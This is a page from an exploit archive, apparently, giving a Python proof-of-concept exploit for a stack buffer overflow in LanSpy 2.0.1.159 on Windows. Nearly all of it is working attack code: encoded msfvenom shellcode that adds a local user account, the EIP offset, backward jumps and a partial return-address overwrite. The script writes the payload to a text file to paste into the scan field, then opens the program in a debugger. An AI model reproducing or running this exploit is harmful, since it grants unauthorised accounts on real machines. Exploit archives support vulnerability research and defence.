LanSpy 2.0.1.159 Stack Buffer Overflow

LanSpy version 2.0.1.159 stack buffer overflow exploit that adds a user.


MD5 | b0153a74496953acb5708e0d11dbf08d

"""
Exploit title: LanSpy v.2.0.1.159 - Stack Buffer Overflow
Exploit Author: Paolo Stagno aka VoidSec - [email protected] - https://voidsec.com
Vendor Homepage: https://lizardsystems.com/
Download: https://www.exploit-db.com/apps/70a780b78ee7dbbbbc99852259f75d53-lanspy_setup_2.0.1.159.exe
Version: v.2.0.1.159
Tested on: Windows 10 Pro x64 v.1909 Build 18363.418
Category: local exploits
Platform: windows
Usage: Open the APP > click on the scan field > paste the contents from the generated "LanSpy_v.2.0.1.159_exploit.txt" file
"""
#!/usr/bin/python
import os,subprocess,struct,platform
filename="LanSpy_v.2.0.1.159_exploit.txt"
EIP_offset = 680

"""
03F9FB48 start of our "junk" buffer
03F9FDDB end of not corruppted "junk" buffer
03F9FDDB - 03F9FB48 = 659 - 22 (pad+stack_adj) = 637 bytes for shellcode
"""

stack_adj = "\x83\xec\x78" * 10 # stack_adj; sub esp,0x78 (120*10=1200)
# BAD CHARS: \x00\x01\x02\x03\x04\x05\x06\x07\x09\x0a\x0b\x0c\x0d\x0f\x10\x11\x12\x13\x14\x1a\x1b\x1c\x1d\x1e\x1f\x2c
# msfvenom -p windows/adduser USER=VoidSec PASS=VoidSec1! -a x86 --platform windows -e x86/alpha_mixed -f python -v shellcode
# Payload size: 608 bytes
shellcode = b""
shellcode += b"\x89\xe2\xd9\xcf\xd9\x72\xf4\x5b\x53\x59\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43"
shellcode += b"\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50"
shellcode += b"\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += b"\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38"
shellcode += b"\x41\x42\x75\x4a\x49\x79\x6c\x48\x68\x4e\x62"
shellcode += b"\x63\x30\x75\x50\x45\x50\x71\x70\x4e\x69\x4a"
shellcode += b"\x45\x46\x51\x39\x50\x65\x34\x4e\x6b\x42\x70"
shellcode += b"\x70\x30\x4c\x4b\x62\x72\x56\x6c\x6e\x6b\x50"
shellcode += b"\x52\x36\x74\x4c\x4b\x62\x52\x66\x48\x36\x6f"
shellcode += b"\x6e\x57\x53\x7a\x54\x66\x35\x61\x59\x6f\x4c"
shellcode += b"\x6c\x47\x4c\x30\x61\x33\x4c\x57\x72\x66\x4c"
shellcode += b"\x31\x30\x79\x51\x38\x4f\x66\x6d\x35\x51\x58"
shellcode += b"\x47\x6d\x32\x38\x72\x51\x42\x63\x67\x6e\x6b"
shellcode += b"\x63\x62\x42\x30\x4e\x6b\x52\x6a\x67\x4c\x4e"
shellcode += b"\x6b\x30\x4c\x72\x31\x74\x38\x39\x73\x42\x68"
shellcode += b"\x43\x31\x7a\x71\x36\x31\x4c\x4b\x50\x59\x31"
shellcode += b"\x30\x46\x61\x58\x53\x6e\x6b\x67\x39\x65\x48"
shellcode += b"\x58\x63\x47\x4a\x67\x39\x6e\x6b\x30\x34\x6e"
shellcode += b"\x6b\x63\x31\x78\x56\x70\x31\x39\x6f\x4c\x6c"
shellcode += b"\x6f\x31\x6a\x6f\x64\x4d\x53\x31\x6a\x67\x65"
shellcode += b"\x68\x6d\x30\x61\x65\x4b\x46\x66\x63\x63\x4d"
shellcode += b"\x69\x68\x75\x6b\x71\x6d\x44\x64\x50\x75\x68"
shellcode += b"\x64\x53\x68\x6c\x4b\x42\x78\x67\x54\x33\x31"
shellcode += b"\x5a\x73\x72\x46\x4e\x6b\x46\x6c\x72\x6b\x6c"
shellcode += b"\x4b\x70\x58\x77\x6c\x63\x31\x69\x43\x4c\x4b"
shellcode += b"\x65\x54\x6c\x4b\x36\x61\x4e\x30\x4c\x49\x37"
shellcode += b"\x34\x37\x54\x56\x44\x43\x6b\x51\x4b\x63\x51"
shellcode += b"\x31\x49\x33\x6a\x52\x71\x6b\x4f\x49\x70\x51"
shellcode += b"\x4f\x63\x6f\x71\x4a\x6e\x6b\x34\x52\x68\x6b"
shellcode += b"\x4e\x6d\x61\x4d\x30\x6a\x66\x61\x4e\x6d\x4f"
shellcode += b"\x75\x68\x32\x67\x70\x75\x50\x57\x70\x32\x70"
shellcode += b"\x72\x48\x66\x51\x6e\x6b\x42\x4f\x6f\x77\x39"
shellcode += b"\x6f\x39\x45\x6d\x6b\x68\x70\x38\x35\x39\x32"
shellcode += b"\x33\x66\x53\x58\x69\x36\x5a\x35\x6f\x4d\x6f"
shellcode += b"\x6d\x49\x6f\x79\x45\x75\x6c\x44\x46\x33\x4c"
shellcode += b"\x34\x4a\x6b\x30\x79\x6b\x4d\x30\x44\x35\x67"
shellcode += b"\x75\x4d\x6b\x30\x47\x36\x73\x34\x32\x70\x6f"
shellcode += b"\x63\x5a\x57\x70\x53\x63\x4b\x4f\x78\x55\x75"
shellcode += b"\x33\x70\x6d\x42\x44\x34\x6e\x65\x35\x61\x68"
shellcode += b"\x45\x35\x65\x70\x74\x6f\x45\x33\x51\x30\x52"
shellcode += b"\x4e\x63\x55\x31\x64\x71\x30\x31\x65\x51\x63"
shellcode += b"\x45\x35\x42\x52\x37\x50\x52\x76\x62\x4f\x43"
shellcode += b"\x59\x70\x64\x42\x73\x30\x65\x43\x53\x65\x70"
shellcode += b"\x30\x56\x42\x4f\x71\x79\x55\x34\x51\x43\x73"
shellcode += b"\x55\x65\x33\x46\x51\x57\x51\x37\x50\x76\x4f"
shellcode += b"\x63\x71\x42\x64\x42\x64\x77\x50\x75\x76\x46"
shellcode += b"\x46\x37\x50\x30\x6e\x31\x75\x54\x34\x77\x50"
shellcode += b"\x50\x6c\x50\x6f\x55\x33\x61\x71\x42\x4c\x75"
shellcode += b"\x37\x32\x52\x70\x6f\x64\x35\x62\x50\x35\x70"
shellcode += b"\x72\x61\x65\x34\x50\x6d\x62\x49\x70\x6e\x43"
shellcode += b"\x59\x72\x53\x64\x34\x53\x42\x31\x71\x53\x44"
shellcode += b"\x70\x6f\x64\x32\x64\x33\x65\x70\x71\x46\x32"
shellcode += b"\x4f\x55\x39\x63\x54\x33\x63\x72\x45\x52\x43"
shellcode += b"\x55\x70\x46\x4f\x43\x71\x42\x64\x52\x64\x35"
shellcode += b"\x50\x41\x41"

pad = "A" * 12
jmp_far = "\xe9\x5c\xfd\xff\xff" # JMP FAR BACKWARDS
jmp_short = "\x41\xeb\xf6\x41" # ECX point here ; JMP SHORT BACKWARDS
eip = "\xad\x40\x40" # EIP 0x004040ad : jmp ecx | startnull {PAGE_EXECUTE_READ} [lanspy.exe] ; partial overwrite to keep \x00 (that is a null byte)
# original nSEH and SEH below are left untouched
# nSEH
# SEH

payload = "A" * ( EIP_offset - len(stack_adj) - len(shellcode) - len(pad) - len(jmp_far) - len(jmp_short) ) + stack_adj + shellcode + pad + jmp_far + jmp_short + eip

f = open(filename, 'w')
f.write(payload)
f.close()

print("Wrote {} bytes".format(len(payload)))

ver = platform.machine()
if ver.endswith('64'):
debuggercmd = "C:\\Program Files (x86)\\Immunity Inc\\Immunity Debugger\\ImmunityDebugger.exe"
else:
debuggercmd = "C:\\Program Files\\Immunity Inc\\Immunity Debugger\\ImmunityDebugger.exe"
subprocess.call([debuggercmd,"C:\\Program Files (x86)\\LizardSystems\\LanSpy\\lanspy.exe",""])

Related Posts